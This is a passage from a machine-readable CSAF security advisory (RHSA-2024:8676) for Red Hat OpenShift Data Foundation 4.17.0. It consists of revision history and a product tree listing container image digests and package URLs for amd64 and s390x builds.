"self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8676.json", }, ], title: "Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.17.0 Security, Enhancement, & Bug Fix Update", tracking: { current_release_date: "2024-12-18T04:38:16+00:00", generator: { date: "2024-12-18T04:38:16+00:00", engine: { name: "Red Hat SDEngine", version: "4.2.3", }, }, id: "RHSA-2024:8676", initial_release_date: "2024-10-30T14:25:22+00:00", revision_history: [ { date: "2024-10-30T14:25:22+00:00", number: "1", summary: "Initial version", }, { date: "2024-10-30T14:25:22+00:00", number: "2", summary: "Last updated version", }, { date: "2024-12-18T04:38:16+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "RHODF 4.17 for RHEL 9", product: { name: "RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17", product_identification_helper: { cpe: "cpe:/a:redhat:openshift_data_foundation:4.17::el9", }, }, }, ], category: "product_family", name: "Red Hat OpenShift Data Foundation", }, { branches: [ { category: "product_version", name: "odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", product: { name: "odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", product_id: "odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", product_identification_helper: { purl: "pkg:oci/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d?arch=amd64&repository_url=registry.redhat.io/odf4/cephcsi-rhel9&tag=v4.17.0-46", }, }, }, { category: "product_version", name: "odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", product: { name: "odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", product_id: "odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", product_identification_helper: { purl: "pkg:oci/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0?arch=amd64&repository_url=registry.redhat.io/odf4/cephcsi-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", product: { name: "odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", product_id: "odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", product_identification_helper: { purl: "pkg:oci/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a?arch=amd64&repository_url=registry.redhat.io/odf4/cephcsi-rhel9-operator&tag=v4.17.0-15", }, }, }, { category: "product_version", name: "odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", product: { name: "odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", product_id: "odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", product_identification_helper: { purl: "pkg:oci/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4?arch=amd64&repository_url=registry.redhat.io/odf4/mcg-core-rhel9&tag=v4.17.0-69", }, }, }, { category: "product_version", name: "odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", product: { name: "odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", product_id: "odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", product_identification_helper: { purl: "pkg:oci/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884?arch=amd64&repository_url=registry.redhat.io/odf4/mcg-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", product: { name: "odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", product_id: "odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", product_identification_helper: { purl: "pkg:oci/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e?arch=amd64&repository_url=registry.redhat.io/odf4/mcg-rhel9-operator&tag=v4.17.0-23", }, }, }, { category: "product_version", name: "odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", product: { name: "odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", product_id: "odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", product_identification_helper: { purl: "pkg:oci/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9&tag=v4.17.0-53", }, }, }, { category: "product_version", name: "odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", product: { name: "odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", product_id: "odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", product_identification_helper: { purl: "pkg:oci/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", product: { name: "odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", product_id: "odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", product_identification_helper: { purl: "pkg:oci/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator&tag=v4.17.0-31", }, }, }, { category: "product_version", name: "odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", product: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", product_id: "odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", product_identification_helper: { purl: "pkg:oci/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9&tag=v4.17.0-66", }, }, }, { category: "product_version", name: "odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", product: { name: "odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", product_id: "odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", product_identification_helper: { purl: "pkg:oci/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", product: { name: "odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", product_id: "odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", product_identification_helper: { purl: "pkg:oci/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-rhel9-operator&tag=v4.17.0-60", }, }, }, { category: "product_version", name: "odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", product: { name: "odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", product_id: "odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", product_identification_helper: { purl: "pkg:oci/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4?arch=amd64&repository_url=registry.redhat.io/odf4/odf-cli-rhel9&tag=v4.17.0-29", }, }, }, { category: "product_version", name: "odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", product: { name: "odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", product_id: "odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", product_identification_helper: { purl: "pkg:oci/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081?arch=amd64&repository_url=registry.redhat.io/odf4/odf-console-rhel9&tag=v4.17.0-53", }, }, }, { category: "product_version", name: "odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", product: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", product_id: "odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", product_identification_helper: { purl: "pkg:oci/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1?arch=amd64&repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9&tag=v4.17.0-7", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", product: { name: "odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", product_id: "odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4?arch=amd64&repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", product: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", product_id: "odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da?arch=amd64&repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator&tag=v4.17.0-30", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", product: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", product_id: "odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b?arch=amd64&repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9&tag=v4.17.0-30", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", product: { name: "odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", product_id: "odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", product_identification_helper: { purl: "pkg:oci/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4?arch=amd64&repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9&tag=v4.17.0-53", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", product: { name: "odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", product_id: "odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", product_identification_helper: { purl: "pkg:oci/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898?arch=amd64&repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", product: { name: "odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", product_id: "odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", product_identification_helper: { purl: "pkg:oci/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1?arch=amd64&repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator&tag=v4.17.0-17", }, }, }, { category: "product_version", name: "odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", product: { name: "odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", product_id: "odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", product_identification_helper: { purl: "pkg:oci/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70?arch=amd64&repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9&tag=v4.17.0-14", }, }, }, { category: "product_version", name: "odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", product: { name: "odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", product_id: "odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", product_identification_helper: { purl: "pkg:oci/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2?arch=amd64&repository_url=registry.redhat.io/odf4/odf-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", product: { name: "odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", product_id: "odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", product_identification_helper: { purl: "pkg:oci/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f?arch=amd64&repository_url=registry.redhat.io/odf4/odf-rhel9-operator&tag=v4.17.0-20", }, }, }, { category: "product_version", name: "odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", product: { name: "odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", product_id: "odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", product_identification_helper: { purl: "pkg:oci/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1?arch=amd64&repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", product: { name: "odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", product_id: "odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", product_identification_helper: { purl: "pkg:oci/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f?arch=amd64&repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", product: { name: "odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", product_id: "odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", product_identification_helper: { purl: "pkg:oci/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3?arch=amd64&repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", product: { name: "odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", product_id: "odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", product_identification_helper: { purl: "pkg:oci/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87?arch=amd64&repository_url=registry.redhat.io/odf4/odr-rhel9-operator&tag=v4.17.0-40", }, }, }, { category: "product_version", name: "odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", product: { name: "odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", product_id: "odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", product_identification_helper: { purl: "pkg:oci/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda?arch=amd64&repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", product: { name: "odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", product_id: "odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", product_identification_helper: { purl: "pkg:oci/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438?arch=amd64&repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", product: { name: "odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", product_id: "odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", product_identification_helper: { purl: "pkg:oci/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2?arch=amd64&repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator&tag=v4.17.0-51", }, }, }, ], category: "architecture", name: "amd64", }, { branches: [ { category: "product_version", name: "odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", product: { name: "odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", product_id: "odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", product_identification_helper: { purl: "pkg:oci/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49?arch=s390x&repository_url=registry.redhat.io/odf4/cephcsi-rhel9&tag=v4.17.0-46", }, }, }, { category: "product_version", name: "odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", product: { name: "odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", product_id: "odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", product_identification_helper: { purl: "pkg:oci/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9?arch=s390x&repository_url=registry.redhat.io/odf4/cephcsi-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", product: { name: "odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", product_id: "odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", product_identification_helper: { purl: "pkg:oci/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580?arch=s390x&repository_url=registry.redhat.io/odf4/cephcsi-rhel9-operator&tag=v4.17.0-15", }, }, }, { category: "product_version", name: "odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", product: { name: "odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", product_id: "odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", product_identification_helper: { purl: "pkg:oci/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7?arch=s390x&repository_url=registry.redhat.io/odf4/mcg-core-rhel9&tag=v4.17.0-69", }, }, }, { category: "product_version", name: "odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", product: { name: "odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", product_id: "odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", product_identification_helper: { purl: "pkg:oci/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc?arch=s390x&repository_url=registry.redhat.io/odf4/mcg-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", product: { name: "odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", product_id: "odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", product_identification_helper: { purl: "pkg:oci/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d?arch=s390x&repository_url=registry.redhat.io/odf4/mcg-rhel9-operator&tag=v4.17.0-23", }, }, }, { category: "product_version", name: "odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", product: { name: "odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", product_id: "odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", product_identification_helper: { purl: "pkg:oci/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9&tag=v4.17.0-53", }, }, }, { category: "product_version", name: "odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", product: { name: "odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", product_id: "odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", product_identification_helper: { purl: "pkg:oci/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", product: { name: "odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", product_id: "odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", product_identification_helper: { purl: 